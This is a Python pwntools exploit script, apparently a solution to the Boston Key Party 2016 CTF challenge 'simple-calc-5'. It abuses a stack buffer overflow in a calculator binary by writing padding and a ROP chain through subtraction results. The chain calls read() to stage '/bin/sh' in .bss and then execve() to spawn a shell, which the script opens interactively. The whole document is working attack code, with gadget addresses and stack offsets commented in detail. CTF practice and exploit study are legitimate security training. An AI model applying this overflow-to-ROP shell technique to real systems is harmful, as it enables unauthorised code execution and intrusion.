#!/usr/bin/env python2
# Boston Key Party CTF : simple-calc-5
# https://github.com/ctfs/write-ups-2016/tree/master/boston-key-party-2016/pwn/simple-calc-5
import numpy as np
from pwn import *
# gdb-peda$ x/20gx $rbp-0x40
# 0x7fffffffdd90: 0x0000000000000001 0x0000000000000001
# 0x7fffffffdda0: 0x00007fffffffdeb8 0x0000000000401c77
# 0x7fffffffddb0: 0x00000000004002b0 0x0000000a00000001
# 0x7fffffffddc0: 0x00000000006c8bf0 <- buf 0x0000000200401c00
# 0x7fffffffddd0: 0x00000000006c1018 0x000000000040176c <- return addr
# 0x7fffffffdde0: 0x0000000000000000 0x0000000100000000
# 0x7fffffffddf0: 0x00007fffffffdeb8 0x0000000000401383
# 0x7fffffffde00: 0x00000000004002b0 0x7215c023ec079001
# 0x7fffffffde10: 0x0000000000000000 0x0000000000401c00
# 0x7fffffffde20: 0x0000000000401c90 0x0000000000000000
# Stack layout taken from the gdb dump above.  Only the *difference* of the
# two addresses matters (the absolute values change under ASLR): it is the
# number of bytes between the on-stack buffer the overflow starts from
# ($rbp-0x40, the dump's base) and the saved return address at $rbp+8.
_addr_stack_buf = 0x7fffffffdd90   # $rbp-0x40: first slot of the overflow
_addr_saved_rip = 0x7fffffffddd8   # $rbp+8: saved return address
offset_return_addr = _addr_saved_rip - _addr_stack_buf   # 0x48 = 18 dwords

# Writable scratch area in .bss used to stage "/bin/sh" and its argv array.
# Absolute 0x4xxxxx gadget addresses suggest a static, non-PIE binary, so
# this address is stable across runs -- re-derive it if the binary changes.
addr_bss = 0x6c2c40

# ROP gadgets (absolute addresses as reported by the gadget finder).
addr_pop_rax_ret = 0x44db34   # pop rax ; ret   -> syscall number
addr_pop_rdi_ret = 0x401b73   # pop rdi ; ret   -> argument 1
addr_pop_rsi_ret = 0x401c87   # pop rsi ; ret   -> argument 2
addr_pop_rdx_ret = 0x437a85   # pop rdx ; ret   -> argument 3
addr_syscall_ret = 0x4648e5   # syscall ; ret

# The target process (pwntools tube); every helper below talks to it.
r = process('./b28b103ea5f1171553554f0127696a18c6d2dcf7')
# Options Menu:
# [1] Addition.
# [2] Subtraction.
# [3] Multiplication.
# [4] Division.
# [5] Save and Exit.
# =>
def choose_action(n):
    """Select menu entry *n* once the target has printed its "=> " prompt."""
    r.sendlineafter('[5] Save and Exit.\n=> ', str(n))
def calc(n, x, y):
    """Run menu operation *n* on integers *x* and *y* and log the result.

    The target echoes "... y is <result>."; the number in front of the
    period is parsed and logged in hex so each value pushed into the
    results array can be checked against what was intended.
    """
    choose_action(n)
    r.sendlineafter('Integer x: ', str(x))
    r.sendlineafter('Integer y: ', str(y))
    r.recvuntil(' y is ')
    result = int(r.recvuntil('.')[:-1])
    log.success('writing success! : 0x%x' % result)
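def write_value_32(x):
    """Append the 32-bit value *x* to the results array via one subtraction.

    Only the low 32 bits of *x* are used, read as two's complement.  Both
    operands sent to the target are kept >= 0x28 -- presumably the binary
    rejects smaller inputs, which is why the original biased by 0x28; confirm
    against the input check in the binary.  The subtraction still yields
    exactly *x*:

        x >= 0:  (x + 0x28) - 0x28
        x <  0:  0x28 - (0x28 - x)      (0x28 - x is positive)

    The sign used to be taken with np.int32(x); that wraps silently on old
    numpy and raises OverflowError on numpy >= 2 for inputs such as
    0xffffffff.  The explicit mask / sign-extension below needs neither.

    NOTE(review): values within 0x28 of INT32_MIN or INT32_MAX push one
    operand outside the 32-bit range; this payload never does that, so the
    case is not handled here.
    """
    v = x & 0xffffffff
    if v & 0x80000000:
        v -= 0x100000000   # sign-extend: 0x80000000..0xffffffff -> negative
    if v >= 0:
        calc(2, v + 0x28, 0x28)
    else:
        calc(2, 0x28, 0x28 - v)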
def write_value_64(x):
    """Append the 64-bit value *x* as two 32-bit results, low dword first.

    Results are consumed sequentially (the zero-fill loop counts them in
    4-byte steps up to the return address), so writing the low half and then
    the high half lays *x* out as a little-endian qword.  Bits above 63 are
    discarded.
    """
    low, high = x & 0xffffffff, (x >> 32) & 0xffffffff
    for dword in (low, high):
        write_value_32(dword)
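# --- Exploit flow ----------------------------------------------------------
# 1. Declare enough calculations for the 18 padding dwords plus the ROP words
#    (the +100 is slack; presumably the target sizes its buffer from this
#    count -- confirm).  `//` keeps the count an int under Python 3 as well,
#    where `/` would make str() send "118.0".
n_padding = offset_return_addr // 4
r.recvuntil('Expected number of calculations: ')
r.sendline(str(n_padding + 100))

# 2. Zero-fill everything between the buffer and the saved return address.
#    Besides being padding, this zeroes the stack words shown in the dump;
#    the qword at $rbp-0x10 is annotated "buf" there, so if the target frees
#    that pointer on exit a NULL keeps free() harmless -- confirm in the
#    binary before relying on it.
for _ in range(n_padding):
    write_value_32(0)

# 3. ROP chain, x86-64 syscall ABI (rax = number, rdi/rsi/rdx = args 1..3):
#      read(0, addr_bss, 0x1000)             -- stage the payload in .bss
#      execve(addr_bss, addr_bss + 8, NULL)  -- "/bin/sh" with argv at +8
rop = [
    # read(0, addr_bss, 0x1000)
    addr_pop_rax_ret, 0,
    addr_pop_rdi_ret, 0,
    addr_pop_rsi_ret, addr_bss,
    addr_pop_rdx_ret, 0x1000,
    addr_syscall_ret,
    # execve(addr_bss, addr_bss + 8, 0)
    addr_pop_rax_ret, 0x3b,
    addr_pop_rdi_ret, addr_bss,
    addr_pop_rsi_ret, addr_bss + 8,
    addr_pop_rdx_ret, 0,
    addr_syscall_ret,
]
for word in rop:
    write_value_64(word)

# 4. "Save and Exit" is where the overflow presumably fires (results copied
#    over the frame); the chain then runs and read() waits on stdin for the
#    payload laid out below.
choose_action(5)

# Payload staged at addr_bss by the read() syscall:
#   +0   "/bin/sh\0"      execve path
#   +8   p64(addr_bss)    argv[0] -> "/bin/sh"
#   +16  p64(0)           argv terminator
# Bytes literals keep the concatenation valid under both Python 2 and 3.
buf = b'/bin/sh'.ljust(8, b'\x00') + p64(addr_bss) + p64(0)
r.send(buf)
r.interactive()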